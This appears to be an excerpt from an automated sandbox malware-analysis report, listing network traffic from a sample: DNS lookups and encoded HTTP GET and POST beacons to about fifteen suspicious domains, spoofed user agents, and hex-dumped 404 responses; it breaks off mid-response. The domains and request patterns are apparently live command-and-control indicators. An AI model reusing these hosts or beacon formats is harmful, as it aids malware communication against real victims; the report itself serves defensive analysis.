            Source: Joe Sandbox ViewASN Name: PINDC-ASRU PINDC-ASRU
            Source: Joe Sandbox ViewASN Name: HOSTIRAN-NETWORKIR HOSTIRAN-NETWORKIR
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /v7i9/?FR=gVd2Q54c4wAw8FSZkJGisnGWxrnrZZv7nPVFwBxZuIdr/R+LakyKOxGnexM5cwgplfvhbdxFrnk6Pq1kbTlH0ZjmVJXvVLu8DIcVEX5jt3TfiQ8a19HD/2BSGQQXtF0fkmM7X0U=&yXghy=KTox HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.omexai.infoConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /wft4/?FR=YTkKwJ8ciWwfk9EboTVmJ8A8z5nQoA6H/11M7sDGKdLnpvCCOp1eIxB3H/IGbE8NJw3dU7UJgJnjxevpFaH+9r0+hPUAaenfY1NUgmg0rJlUJj6QFUl1BdaUrKMG7GtZPuGkbd0=&yXghy=KTox HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.030003678.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /wxmz/?FR=/3704Vff3w19bJxFjboY/IbcCRxq7QB064cYUEYQjha4p4PIlcXs4dWmoF91tthlGgXSeDBpFM7AphPZ13xvSCd02IeXzvs2jATKINKka4nP9dH8TaBgBhg9ZbFNrO+hXaJ7nrQ=&yXghy=KTox HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.sorriragora.onlineConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xvas/?FR=J9/McS+K1SnUK1dFtfBkoa6WP04kmDmbslaJUnd233GmVE8UX2CUiD/aW92xdqFDEXAl7OPacYUbAp8GfP4HaHix7g4VEpF6t7or8oS92HRG4MEXui+46ttkhOnPdDZiG6qh46k=&yXghy=KTox HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.homebizsuccess.blogConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gd7t/?yXghy=KTox&FR=JlAcjlx2Gdg+DXM3i59+nmMFZHdISfOX/D3i1++YLzSS1YHv0m41CgGfSm0I/piMileZ/olvBUKxdIaFHHAoN7eK5KUeh7JInwAPNKMw/FJo5s/UjYShm5Z/UsIKNOFZiX+3bL8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.hm62t.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /i28e/?yXghy=KTox&FR=aGpxVX6kGAU+vZyZZfJTCDz7/lPsBFWDos3dY6ZsNYZMPz7BIFF7kPeLI34j35LFjHkoTmJm1HUVC8sGZtVHFfldRMYhCGprZu/MBi0oweQaoGEXOF433+gvsUsQ2wF2VEo07O8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.030002721.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /so9n/?FR=kfwT0b19IOKcOFwPtUe9Dwhdq1KCUnZZUdvJW1zli8UTkV27q7a5c8UKgIiCSTwlp8ToQZ+GSYiqoCrUiDCARooQABC7bvQsg0wobGai6LL68ECzCx14NnY8N25SgLExp3s5W9s=&yXghy=KTox HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.lumixy.onlineConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /pf98/?FR=3jBDcWbmLrShHmxnPMFZKghCFWWefh1Z2LPMDwvUTpx/DkKazbfgKbcBR8lW4oJr2d6xPk4dsMQJMRxiEW07CNh+pZ1lAg0Z7H/dVeHhjsdFGVPZJstcy8xxVNZ/uGWZUGk7w1E=&yXghy=KTox HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kalomor.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /uq6q/?FR=9Otm+20UpUikA6x0VD212tqxG3jyIPcWfHFyJTdbxKGeDxDVLjdT/4jyPXypOz+d9yZQrKELvtj6jM/m3RUo26f0zJnEKMWuurbJZWWdFjqlgtWZigu2A/olrWAWySRFQjrMuco=&yXghy=KTox HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.henrry.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4jz5/?yXghy=KTox&FR=r5SoQQ/DZBXKP6QrNwGfWrJNBN6t0nUZU0GWsfQ0/kE9qy9dgr2+a8OrPCjBDi0TM6SD7wE/mt75vEwxSaGxWB73VkpxOVd4no3A+iHSW7NgpDpMEtZ9JlGQE1ss8/xFDzn1hco= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.1win-moldovia.funConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /j05r/?FR=BuWlesfdBtPnA5IHERdoQmZu3QbBl1BpYdqEJlZZDkGznKOwHVqz9ciJpAUT/J3S93ftOAqXjjElrJOBApQXUwRpks3avQJqxp6cbB0vhTJHmzWOGAIsV62ofQDOeP44q5hyDP4=&yXghy=KTox HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.thewhitediamond.orgConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /539x/?FR=vGL9u4UoqpVZZPxrAmsiFiNaZFXain6KGFUZntJW9QYk7D2LL7MCvEOQVB7xyJGTP+28tzk4zfIPRYPtsAwCb1rqdvGtj+iK/r6v/IcJfZgSJV4K5VQUlSITkxaZv9eo0HTeJgk=&yXghy=KTox HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.aflaksokna.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /d029/?FR=cslaSIgu4SK5hEDj9hUVBt4DVeSxODrxiV3UUYpYDpvuIfyXRHc3+9hbGUkpPVL7vSNSmH7KmnD+rq4wgj4O7IkekeXb2lWER124D4kOUSFtT1194nz+plZg+E7GwvWNw7cZgDY=&yXghy=KTox HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.easyanalytics.siteConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bb55/?FR=qdzUF+C4KgbVJvWmmn8R5hRL/2fqEFiYhougQvjggmODZzWjY8rbJBXd+0mtuuLK6ozYWyaagBrSOvtROhupesjxef+9ZK6Rgj9rnagPgpTk5Eewhqg4wMCweUmjwTCKS2nymHQ=&yXghy=KTox HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.moveon.catConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.omexai.info
            Source: global trafficDNS traffic detected: DNS query: www.030003678.xyz
            Source: global trafficDNS traffic detected: DNS query: www.sorriragora.online
            Source: global trafficDNS traffic detected: DNS query: www.homebizsuccess.blog
            Source: global trafficDNS traffic detected: DNS query: www.hm62t.top
            Source: global trafficDNS traffic detected: DNS query: www.318st.com
            Source: global trafficDNS traffic detected: DNS query: www.030002721.xyz
            Source: global trafficDNS traffic detected: DNS query: www.lumixy.online
            Source: global trafficDNS traffic detected: DNS query: www.kalomor.top
            Source: global trafficDNS traffic detected: DNS query: www.henrry.top
            Source: global trafficDNS traffic detected: DNS query: www.1win-moldovia.fun
            Source: global trafficDNS traffic detected: DNS query: www.thewhitediamond.org
            Source: global trafficDNS traffic detected: DNS query: www.aflaksokna.com
            Source: global trafficDNS traffic detected: DNS query: www.easyanalytics.site
            Source: global trafficDNS traffic detected: DNS query: www.moveon.cat
            Source: unknownHTTP traffic detected: POST /wft4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.030003678.xyzContent-Length: 207Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeOrigin: http://www.030003678.xyzReferer: http://www.030003678.xyz/wft4/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 46 52 3d 56 52 4d 71 7a 2f 55 79 71 58 52 45 30 72 31 35 72 53 56 52 50 49 6c 68 77 49 50 51 6f 6b 54 56 72 78 74 65 33 74 66 62 4c 36 61 33 6d 34 4f 2f 4b 50 68 56 42 43 78 55 4c 73 78 31 65 46 31 50 49 58 6e 35 4e 61 77 41 78 64 37 63 6c 72 6e 46 4c 34 72 44 70 4c 51 4d 76 36 59 7a 4c 4f 33 72 66 79 6c 48 74 41 35 58 2b 72 51 4a 4a 45 61 6a 42 67 56 35 53 66 7a 43 7a 5a 74 48 68 58 67 53 43 38 4b 69 50 34 4a 71 2f 45 55 68 62 66 48 74 65 64 52 33 32 6b 2f 4e 6e 77 76 71 5a 67 32 36 6c 75 78 34 4c 54 53 5a 2b 4a 6b 68 6d 2b 78 52 77 51 49 4b 41 44 6b 36 73 4a 4d 53 70 4c 4c 66 32 78 50 73 75 4e 70 4c 2b 4d 51 64 Data Ascii: FR=VRMqz/UyqXRE0r15rSVRPIlhwIPQokTVrxte3tfbL6a3m4O/KPhVBCxULsx1eF1PIXn5NawAxd7clrnFL4rDpLQMv6YzLO3rfylHtA5X+rQJJEajBgV5SfzCzZtHhXgSC8KiP4Jq/EUhbfHtedR32k/NnwvqZg26lux4LTSZ+Jkhm+xRwQIKADk6sJMSpLLf2xPsuNpL+MQd
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 06 Sep 2024 07:05:13 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 06 Sep 2024 07:05:16 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 06 Sep 2024 07:05:18 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 06 Sep 2024 07:05:21 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 